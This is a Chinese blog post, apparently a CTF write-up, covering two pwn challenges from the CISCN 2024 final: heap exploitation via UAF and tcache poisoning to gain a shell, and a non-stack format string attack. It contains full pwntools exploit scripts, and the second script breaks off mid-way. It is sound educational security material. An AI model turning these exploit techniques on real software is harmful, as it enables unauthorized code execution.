<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="manifest" href="/images/site.webmanifest">
  <link rel="shortcut icon" href="/images/favicon.ico">

  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>CISCN Final 2024 | Y² 的博客</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="CISCN Final 2024" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="国赛决赛PWN赛后复现：" />
<meta property="og:description" content="国赛决赛PWN赛后复现：" />
<link rel="canonical" href="https://www.cameudis.com/2024/07/24/CISCN-Final-2024.html" />
<meta property="og:url" content="https://www.cameudis.com/2024/07/24/CISCN-Final-2024.html" />
<meta property="og:site_name" content="Y² 的博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-07-24T07:50:11+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="CISCN Final 2024" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-07-24T07:50:11+08:00","datePublished":"2024-07-24T07:50:11+08:00","description":"国赛决赛PWN赛后复现：","headline":"CISCN Final 2024","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.cameudis.com/2024/07/24/CISCN-Final-2024.html"},"url":"https://www.cameudis.com/2024/07/24/CISCN-Final-2024.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://www.cameudis.com/feed.xml" title="Y² 的博客" /><script src="//unpkg.com/valine/dist/Valine.min.js"></script>
</head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Y² 的博客</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a><a class="page-link" href="/links/">Links</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">CISCN Final 2024</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2024-07-24T07:50:11+08:00" itemprop="datePublished">Jul 24, 2024
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>国赛决赛PWN赛后复现：</p>

<ul>
  <li>ezheap: 入门堆题，存在 UAF 和任意大小溢出</li>
  <li>anime: 非栈上的格式化字符串漏洞</li>
</ul>

<h2 id="ezheap">ezheap</h2>

<h3 id="程序分析">程序分析</h3>

<p>程序环境为 <code class="language-plaintext highlighter-rouge">2.31</code>，二进制保护全开：</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>checksec ./ezheap
<span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/cameudis/ctf/ciscn2024-final/ezheap/ezheap'</span>
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
</code></pre></div></div>

<p>程序在读入用户输入后，马上就进行了神秘的解析操作。遇到这种情况，我们有以下解决方案：</p>

<ol>
  <li>盲猜是 JSON，或根据解析函数中的一些硬编码的字符发现是 JSON（比如 <code class="language-plaintext highlighter-rouge">'{'</code>）</li>
  <li>求助具有丰富逆向经验的队友，发现使用了 cJSON 库</li>
  <li>使用提前准备的签名进行匹配，如下图所示：</li>
</ol>

<p><img src="https://pic.imgdb.cn/item/669fbbd0d9c307b7e92a4b4d.png" alt="cJSON Signature Match" /></p>

<p>关于 Binary Ninja 如何制作与匹配二进制签名，可以参考 <a href="https://docs.binary.ninja/dev/annotation.html#exporting-a-header">官方文档</a>。</p>

<p>除了神秘的解析之外，本题就是一个入门级菜单堆题。漏洞点有两个：</p>

<ul>
  <li>Delete 函数中存在 dangling pointer（指针未清零）；</li>
  <li>Modify 函数中存在任意大小溢出；</li>
</ul>

<h3 id="利用思路">利用思路</h3>

<p>由于 new 函数中对堆块大小做了 0x400 的限制，且一共只能分配 7 个堆块，因此如果想要泄露 libc 地址，需要通过溢出把堆块 size 改大，来把堆块 free 进 unsorted bin 中。</p>

<p>在此以后，直接 view 还拿不到 libc 地址。由于 cJSON 的实现，在解析用户的指令时，它会申请一系列的堆块。由于刚刚释放进 unsorted bin 的堆块足够大，所以它会被切割数次，导致原来位置上不再是一个指向 unsorted bin 的指针。</p>

<p>但这种情况也很好解决，堆上还有很多遗留的地址，可以先 edit 然后顺带把地址给读出来。（感谢 V3rdant 师傅）</p>

<p>之后就是使用 tcache poisoning 来将 <code class="language-plaintext highlighter-rouge">__free_hook</code> 劫持为 <code class="language-plaintext highlighter-rouge">system</code>，然后执行 <code class="language-plaintext highlighter-rouge">free("/bin/sh")</code> 来拿到 shell 了。</p>

<h3 id="exploit-script">Exploit Script</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python3
</span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="n">context</span><span class="p">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s">'tmux'</span><span class="p">,</span> <span class="s">'splitw'</span><span class="p">,</span> <span class="s">'-h'</span><span class="p">]</span>

<span class="c1"># ---------------- Environment Config ---------------- #
</span>
<span class="n">filename</span> <span class="o">=</span> <span class="s">"./pwn"</span>
<span class="n">libc_name</span> <span class="o">=</span> <span class="s">"./libc.so.6"</span>

<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libc_name</span><span class="p">)</span>

<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'info'</span>
<span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">filename</span>

<span class="c1"># ------------------- Exploitation ------------------- #
</span>
<span class="n">ru</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">r</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span>      <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span>
<span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sa</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sl</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">s</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

<span class="c1"># {"choice":"add","index":0,"length":16,"message":"aaa"}
</span>
<span class="k">def</span> <span class="nf">comm</span><span class="p">(</span><span class="n">choice</span><span class="p">,</span> <span class="n">index</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span>
    <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">"Please input:"</span><span class="p">)</span>
    <span class="n">s</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="s">"choice"</span><span class="si">:</span><span class="s">"</span><span class="si">{</span><span class="n">choice</span><span class="si">}</span><span class="s">","</span><span class="n">index</span><span class="s">"</span><span class="si">:{</span><span class="n">index</span><span class="si">}</span><span class="p">,</span><span class="s">"length"</span><span class="si">:{</span><span class="n">length</span><span class="si">}</span><span class="p">,</span><span class="s">"message"</span><span class="si">:</span><span class="s">"'.encode()+message+'"</span><span class="si">}</span><span class="se">\n</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>

<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">length</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span>
    <span class="n">comm</span><span class="p">(</span><span class="s">"new"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">message</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">delete</span><span class="p">(</span><span class="n">index</span><span class="p">):</span>
    <span class="n">comm</span><span class="p">(</span><span class="s">"rm"</span><span class="p">,</span> <span class="n">index</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="sa">b</span><span class="s">"a"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">view</span><span class="p">(</span><span class="n">index</span><span class="p">):</span>
    <span class="n">comm</span><span class="p">(</span><span class="s">"view"</span><span class="p">,</span> <span class="n">index</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="sa">b</span><span class="s">"a"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">index</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span>
    <span class="n">comm</span><span class="p">(</span><span class="s">"modify"</span><span class="p">,</span> <span class="n">index</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">message</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">pwn</span><span class="p">():</span>
    <span class="n">add</span><span class="p">(</span><span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'im_block_0'</span><span class="p">)</span>
    <span class="n">add</span><span class="p">(</span><span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'im_block_1'</span><span class="p">)</span>

    <span class="c1"># overflow block_1's size to 0x531 (thus next_chunk is top chunk)
</span>    <span class="n">edit</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x2a0</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mh">0x298</span> <span class="o">+</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x31\x05</span><span class="s">'</span><span class="p">)</span>

    <span class="c1"># unsorted bin
</span>    <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="c1"># leak libc address
</span>    <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0xa8</span><span class="p">,</span> <span class="sa">b</span><span class="s">'a'</span><span class="o">*</span><span class="mh">0xa8</span><span class="p">)</span>
    <span class="n">view</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'a'</span><span class="o">*</span><span class="mh">0xa8</span><span class="p">)</span>
    <span class="n">libc_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s">'</span><span class="se">\0</span><span class="s">'</span><span class="p">))</span><span class="o">-</span><span class="mh">0x1ecbe0</span>
    <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s">'libc_base: </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>

    <span class="c1"># tcache poisoning
</span>    <span class="n">add</span><span class="p">(</span><span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'im_block_2'</span><span class="p">)</span>
    <span class="n">add</span><span class="p">(</span><span class="mh">0x90</span><span class="p">,</span> <span class="sa">b</span><span class="s">'im_block_3'</span><span class="p">)</span>
    <span class="n">add</span><span class="p">(</span><span class="mh">0x90</span><span class="p">,</span> <span class="sa">b</span><span class="s">'im_block_4'</span><span class="p">)</span>
    <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>
    <span class="n">delete</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>
    <span class="n">edit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mh">0x2a8</span><span class="p">,</span> <span class="sa">b</span><span class="s">'a'</span><span class="o">*</span><span class="mh">0x2a0</span> <span class="o">+</span> <span class="n">pack</span><span class="p">(</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">"__free_hook"</span><span class="p">])[:</span><span class="mi">6</span><span class="p">])</span>
    <span class="n">add</span><span class="p">(</span><span class="mh">0x90</span><span class="p">,</span> <span class="sa">b</span><span class="s">'/bin/sh'</span><span class="p">)</span>
    <span class="n">add</span><span class="p">(</span><span class="mh">0x90</span><span class="p">,</span> <span class="n">pack</span><span class="p">(</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">"system"</span><span class="p">])[:</span><span class="mi">6</span><span class="p">])</span>

    <span class="n">delete</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>

    <span class="n">io</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>


<span class="c1"># ------------------ Infrastructure ------------------ #
</span>
<span class="n">gdbscript</span> <span class="o">=</span> <span class="s">'''
'''</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] Cameudis's PWN Framework"</span><span class="p">)</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">gdb</span><span class="p">.</span><span class="n">debug</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">gdbscript</span><span class="o">=</span><span class="n">gdbscript</span><span class="p">,</span> <span class="n">exe</span><span class="o">=</span><span class="n">filename</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"d"</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"r"</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Usage: ./exp.py [d | r]"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\t</span><span class="s">d for direct without debug"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\t</span><span class="s">r for remote"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">()</span>

    <span class="n">pwn</span><span class="p">()</span>
</code></pre></div></div>

<h3 id="patch">Patch</h3>

<p>由于出题人的检验脚本非常恶心，所以本题修复难度非常大。我和队友尝试了非常多种方法后，最后发现把 <code class="language-plaintext highlighter-rouge">malloc</code> 的参数硬编码为 <code class="language-plaintext highlighter-rouge">0x1000</code> 就可以通过检测。</p>

<h2 id="anime">anime</h2>

<h3 id="程序分析-1">程序分析</h3>

<p>程序环境为 <code class="language-plaintext highlighter-rouge">GLIBC 2.31</code>，二进制保护全开：</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>checksec ./pwn
<span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/cameudis/ctf/ciscn2024-final/anime/pwn'</span>
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
</code></pre></div></div>

<p>在 <code class="language-plaintext highlighter-rouge">main</code> 函数中，程序读取用户输入，并使用硬编码的 key 对输入进行 AES 解密。解密后的消息将会直接被使用 <code class="language-plaintext highlighter-rouge">printf</code> 打印出来，存在格式化字符串漏洞。程序会循环执行上述过程三次，然后从 <code class="language-plaintext highlighter-rouge">main</code> 函数返回。</p>

<p>本题的利用难点在于：存储用户输入的缓冲区位于堆上，且限制了我们只有三次攻击机会。</p>

<h3 id="利用思路-1">利用思路</h3>

<p>关于非栈上的格式化字符串，可以先去找找别的资料看。</p>

<p>3 次机会一定是不足以打穿非栈的格式化字符串溢出的，必须想办法进行更多次攻击。在程序中，我们可以发现表示剩余次数的循环变量 <code class="language-plaintext highlighter-rouge">i</code> 保存在栈上，因此一开始仅有的这三次机会可以用来进行 <code class="language-plaintext highlighter-rouge">i</code> 的劫持。</p>

<ol>
  <li>泄漏栈地址、Libc 基址；</li>
  <li>劫持一个栈上的栈指针，使其指向 <code class="language-plaintext highlighter-rouge">i</code>；</li>
  <li>劫持 <code class="language-plaintext highlighter-rouge">i</code> 为一个更大的数。</li>
</ol>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'3 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">b</span><span class="s">'.%6$p.%15$p.</span><span class="se">\0</span><span class="s">'</span><span class="p">,</span> <span class="n">key</span><span class="p">))</span>

<span class="p">...</span>
<span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'.'</span><span class="p">)</span>
<span class="n">stack_base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'.'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="n">decode</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">success</span><span class="p">(</span><span class="s">"stack_base: "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">stack_base</span><span class="p">))</span>
<span class="n">i_addr</span> <span class="o">=</span> <span class="n">stack_base</span><span class="o">-</span><span class="mh">0x124</span>
<span class="n">success</span><span class="p">(</span><span class="s">"i: "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">i_addr</span><span class="p">))</span>
<span class="p">...</span>

<span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'2 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%</span><span class="si">{</span><span class="n">i_addr</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="si">}</span><span class="s">c%6$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>
<span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'1 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%5c%45$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>

</code></pre></div></div>

<p>在此之后就是常规的攻击了。我选择将栈上的返回地址劫持为 libc 中的 one_gadget。</p>

<h3 id="exploit-script-1">Exploit Script</h3>

<p>我使用 <code class="language-plaintext highlighter-rouge">Cryptodomex</code> 库进行 AES 加密。如果有安装 <code class="language-plaintext highlighter-rouge">Cryptodome</code> 库，也可以直接将脚本中所有 <code class="language-plaintext highlighter-rouge">Cryptodome</code> 直接替换为 <code class="language-plaintext highlighter-rouge">Crypto</code>。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python3
</span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">Cryptodome.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="kn">from</span> <span class="nn">Cryptodome.Util.Padding</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">context</span><span class="p">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s">'tmux'</span><span class="p">,</span> <span class="s">'splitw'</span><span class="p">,</span> <span class="s">'-h'</span><span class="p">]</span>

<span class="c1"># ---------------- Environment Config ---------------- #
</span>
<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'info'</span>
<span class="n">context</span><span class="p">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s">'amd64'</span>

<span class="n">libc_name</span> <span class="o">=</span> <span class="s">"./libc.so.6"</span>
<span class="n">filename</span> <span class="o">=</span> <span class="s">"./pwn"</span>

<span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libc_name</span><span class="p">)</span>
<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>

<span class="c1"># ------------------- Exploitation ------------------- #
</span>
<span class="n">ru</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">r</span>   <span class="o">=</span> <span class="k">lambda</span><span class="p">:</span>       <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span>
<span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sa</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sl</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">s</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

<span class="n">key</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mh">0x7b</span><span class="p">,</span><span class="mh">0xf3</span><span class="p">,</span><span class="mh">0x5c</span><span class="p">,</span><span class="mh">0xd6</span><span class="p">,</span><span class="mh">0x9c</span><span class="p">,</span><span class="mh">0x47</span><span class="p">,</span><span class="mh">0x5d</span><span class="p">,</span><span class="mh">0x5e</span><span class="p">,</span><span class="mh">0x6f</span><span class="p">,</span><span class="mh">0x1d</span><span class="p">,</span><span class="mh">0x7a</span><span class="p">,</span><span class="mh">0x23</span><span class="p">,</span><span class="mh">0x18</span><span class="p">,</span><span class="mh">0x7b</span><span class="p">,</span><span class="mh">0xf9</span><span class="p">,</span><span class="mh">0x34</span><span class="p">])</span>

<span class="k">def</span> <span class="nf">aes128_encrypt</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
    <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">cipher</span><span class="p">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">pad</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">block_size</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">aes128_decrypt</span><span class="p">(</span><span class="n">enc</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
    <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">unpad</span><span class="p">(</span><span class="n">cipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">enc</span><span class="p">[</span><span class="n">AES</span><span class="p">.</span><span class="n">block_size</span><span class="p">:]),</span> <span class="n">AES</span><span class="p">.</span><span class="n">block_size</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">pwn</span><span class="p">():</span>

    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'name'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'******'</span><span class="p">)</span>
    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'3 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">b</span><span class="s">'.%6$p.%15$p.</span><span class="se">\0</span><span class="s">'</span><span class="p">,</span> <span class="n">key</span><span class="p">))</span>
    <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'.'</span><span class="p">)</span>
    <span class="n">stack_base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'.'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="n">decode</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
    <span class="n">success</span><span class="p">(</span><span class="s">"stack_base: "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">stack_base</span><span class="p">))</span>
    <span class="n">i_addr</span> <span class="o">=</span> <span class="n">stack_base</span><span class="o">-</span><span class="mh">0x124</span>
    <span class="n">success</span><span class="p">(</span><span class="s">"i: "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">i_addr</span><span class="p">))</span>
    <span class="n">return_addr</span> <span class="o">=</span> <span class="n">i_addr</span><span class="o">+</span><span class="mh">0x34</span>
    <span class="n">success</span><span class="p">(</span><span class="s">"return_addr: "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">return_addr</span><span class="p">))</span>
    <span class="n">libc_base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'.'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="n">decode</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span><span class="o">-</span><span class="mh">0x24083</span>
    <span class="n">success</span><span class="p">(</span><span class="s">"libc_base: "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span>

    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'2 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%</span><span class="si">{</span><span class="n">i_addr</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="si">}</span><span class="s">c%6$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>
    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'1 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%5c%45$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>

